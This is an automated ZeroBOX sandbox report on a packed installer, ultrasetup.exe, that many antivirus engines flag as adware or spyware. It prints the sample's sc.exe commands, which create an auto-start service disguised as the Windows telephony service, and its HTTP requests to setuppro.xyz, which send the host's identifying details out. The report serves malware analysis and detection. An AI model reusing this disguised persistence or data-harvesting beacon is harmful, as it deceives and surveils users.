Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 26, 2022, 5:42 p.m.	Aug. 26, 2022, 5:45 p.m.

Size	1.8MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`036cab509f3d1608c25a17390cc24ccf`
SHA256	`4754a1b3682fa921f7580521e1c4162603d43d2fa1cf101ef09ad88e853d6e2b`
CRC32	`1C56F831`
ssdeep	`24576:t4nXubIQGyxbPV0db26W9M+8osxIV2sv1Et9uGpckT52zedlq89Ws5uIzk5aM/pn:tqe3f668nmVHSffPMWrQ0Zk/`
Yara	IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature Malicious_Library_Zero - Malicious_Library

ultrasetup.exe "C:\Users\test22\AppData\Local\Temp\ultrasetup.exe"
2832
- ultrasetup.tmp "C:\Users\test22\AppData\Local\Temp\is-35A0F.tmp\ultrasetup.tmp" /SL5="$B0138,1092675,831488,C:\Users\test22\AppData\Local\Temp\ultrasetup.exe"
  2912
  - ultrasetup.exe "C:\Users\test22\AppData\Local\Temp\ultrasetup.exe" /VERYSILENT
    1668
    - ultrasetup.tmp "C:\Users\test22\AppData\Local\Temp\is-UNNOR.tmp\ultrasetup.tmp" /SL5="$C0138,1092675,831488,C:\Users\test22\AppData\Local\Temp\ultrasetup.exe" /VERYSILENT
      2140
      - sc.exe "C:\Windows\system32\sc.exe" create Telephone404 start= auto DisplayName= "Telephone404" binPath= "C:\Windows\test22-pc\Runtimebroker8.exe"
        2176
      - sc.exe "C:\Windows\system32\sc.exe" description Telephone404 "Provides Telephony API (TAPI) support for programs that control telephony devices on the local computer and, through the LAN, on servers that are also running the service."
        2280
      - sc.exe "C:\Windows\system32\sc.exe" start Telephone404
        2404
explorer.exe C:\Windows\Explorer.EXE
1156

Name	Response	Post-Analysis Lookup
setuppro.xyz	A 74.208.236.195	74.208.236.195

IP Address	Status	Action
164.124.101.2	Active	Moloch
74.208.236.195	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 26, 2022, 5:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2022, 5:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2022, 5:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2022, 5:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2022, 5:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2022, 5:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2022, 5:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2022, 5:43 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 26, 2022, 5:42 p.m.			0	0
IsDebuggerPresent Aug. 26, 2022, 5:42 p.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 26, 2022, 5:43 p.m.	buffer: [SC] CreateService SUCCESS console_handle: 0x00000007	1	1
WriteConsoleW Aug. 26, 2022, 5:43 p.m.	buffer: [SC] ChangeServiceConfig2 SUCCESS console_handle: 0x00000007	1	1
WriteConsoleW Aug. 26, 2022, 5:43 p.m.	buffer: SERVICE_NAME: Telephone404 TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 2460 FLAGS : console_handle: 0x00000007	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.itext
section	.didata

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Aug. 26, 2022, 5:42 p.m.	stacktrace: TMethodImplementationIntercept+0x1fbb2e dbkFCallWrapperAddr-0x20cb2 ultrasetup+0x2b198e @ 0x6b198e TMethodImplementationIntercept+0x1fbb2e dbkFCallWrapperAddr-0x20cb2 ultrasetup+0x2b198e @ 0x6b198e TMethodImplementationIntercept+0x20e90c dbkFCallWrapperAddr-0xded4 ultrasetup+0x2c476c @ 0x6c476c BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xeedfade exception.offset: 46887 exception.address: 0x760cb727 registers.esp: 1637804 registers.edi: 0 registers.eax: 1637804 registers.ebp: 1637884 registers.edx: 0 registers.ebx: 2 registers.esi: 2 registers.ecx: 7	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Aug. 26, 2022, 5:42 p.m.

stacktrace:

TMethodImplementationIntercept+0x1fbb2e dbkFCallWrapperAddr-0x20cb2 ultrasetup+0x2b198e @ 0x6b198e
TMethodImplementationIntercept+0x1fbb2e dbkFCallWrapperAddr-0x20cb2 ultrasetup+0x2b198e @ 0x6b198e
TMethodImplementationIntercept+0x20e90c dbkFCallWrapperAddr-0xded4 ultrasetup+0x2c476c @ 0x6c476c
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xeedfade
exception.offset: 46887
exception.address: 0x760cb727
registers.esp: 1637804
registers.edi: 0
registers.eax: 1637804
registers.ebp: 1637884
registers.edx: 0
registers.ebx: 2
registers.esi: 2
registers.ecx: 7

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET http://setuppro.xyz/guid.php
suspicious_features	GET method with no useragent header				suspicious_request	GET http://setuppro.xyz/express.php?uid=25528BB73ece216

Performs some HTTP requests (4 events)

request	GET http://setuppro.xyz/iam/ins.php?SMAC=&User=test22<o>PC<q>test22&UUID=25528BB7-B449-A342-B397-00D24064AA0D&Vendor=innotekGmbH&Name=VirtualBox&HDDSerialNumber=VB4b297b00-73ece216&Caption=MicrosoftWindows7ProfessionalKN&OSArchitectures=64-bit&OSerialNumber=61417-561-4045436-92488&ProcessorName=Intel(R)Core(TM)i5-8400CPU@2.80GHz&RAM=5368242176&version=1.52&publisherid=installer
request	GET http://setuppro.xyz/iam/i.php?mid=25528BB73ece216&mac=&publisherid=installer&company=youk&pubid=0&advid=0
request	GET http://setuppro.xyz/guid.php
request	GET http://setuppro.xyz/express.php?uid=25528BB73ece216

Allocates read-write-execute memory (usually to unpack itself) (14 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Aug. 26, 2022, 5:42 p.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:42 p.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 745472 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:42 p.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:42 p.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 73728 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:42 p.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73552000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:42 p.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73552000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2022, 5:42 p.m.	process_identifier: 2912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:42 p.m.	process_identifier: 1668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:42 p.m.	process_identifier: 1668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 745472 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:42 p.m.	process_identifier: 1668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:42 p.m.	process_identifier: 1668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 73728 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:42 p.m.	process_identifier: 1668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73992000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:42 p.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73992000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2022, 5:42 p.m.	process_identifier: 2140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a service (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW Aug. 26, 2022, 5:43 p.m.	service_start_name: start_type: 2 password: display_name: Telephone404 filepath: C:\Windows\test22-pc\Runtimebroker8.exe service_name: Telephone404 filepath_r: C:\Windows\test22-pc\Runtimebroker8.exe desired_access: 983551 service_handle: 0x0052b710 error_control: 1 service_type: 16 service_manager_handle: 0x0052b7b0	1	5420816	0

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\is-35A0F.tmp\ultrasetup.tmp

Queries for potentially installed applications (4 events)

Time & API	Arguments	Status	Return
RegOpenKeyExW Aug. 26, 2022, 5:42 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065}		2
RegOpenKeyExW Aug. 26, 2022, 5:42 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065} base_handle: 0x80000002 key_handle: 0x000002a8 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065}	1	0
RegOpenKeyExW Aug. 26, 2022, 5:43 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065}}_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065}}_is1		2
RegOpenKeyExW Aug. 26, 2022, 5:43 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065} base_handle: 0x80000002 key_handle: 0x00000350 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065}	1	0

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Windows\system32\sc.exe" start Telephone404
cmdline	"C:\Windows\system32\sc.exe" description Telephone404 "Provides Telephony API (TAPI) support for programs that control telephony devices on the local computer and, through the LAN, on servers that are also running the service."
cmdline	"C:\Windows\system32\sc.exe" create Telephone404 start= auto DisplayName= "Telephone404" binPath= "C:\Windows\test22-pc\Runtimebroker8.exe"

Installs itself for autorun at Windows startup (1 event)

service_name

Telephone404

service_path

C:\Windows\test22-pc\Runtimebroker8.exe

Attempts to modify browser security settings (24 events)

registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0018.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_002.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Support_Chat_001.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0015.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Support Chat.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_003.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0012.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_008.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_004.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0011.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_005.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0010.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0017.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_007.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BEHAVIORS\Support Chat.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0019.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0020.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0013.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0016.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_009.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0014.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_006.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_001.exe

File has been identified by 30 AntiVirus engines on VirusTotal as malicious (30 events)

Lionic	Heuristic.File.Generic.00x1!p
Cynet	Malicious (score: 100)
McAfee	Artemis!036CAB509F3D
Cylance	Unsafe
Sangfor	Adware.Win32.Installcommerce.Vuvx
K7AntiVirus	Adware ( 00588bef1 )
Alibaba	AdWare:Win32/InstallCommerce.28e3927d
K7GW	Adware ( 00588bef1 )
Cyren	W32/ABAdware.MNTG-9118
Symantec	Trojan.Gen.MBT
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/Adware.InstallCommerce.A
Paloalto	generic.ml
Kaspersky	Trojan-Spy.Win32.Agent.kbav
Avast	Win32:AdwareX-gen [Adw]
Tencent	Win32.Trojan-spy.Agent.Dlc
McAfee-GW-Edition	BehavesLike.Win32.DStudio.tc
Sophos	Generic PUA AP (PUA)
Ikarus	PUA.InstallCommerce
Avira	ADWARE/Redcap.xmawi
Gridinsoft	Adware.Win32.Agent.cl
ZoneAlarm	Trojan-Spy.Win32.Agent.kbav
GData	Win32.Application.Agent.HK2FNJ
Google	Detected
AhnLab-V3	Malware/Win.Generic.C5190282
Malwarebytes	PUP.Optional.BundleInstaller
TrendMicro-HouseCall	TROJ_GEN.R002H07G622
Rising	Adware.InstallCommerce!8.12CF8 (TFE:5:85cPZ46todH)
Fortinet	Riskware/InstallCommerce
AVG	Win32:AdwareX-gen [Adw]

ultrasetup.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All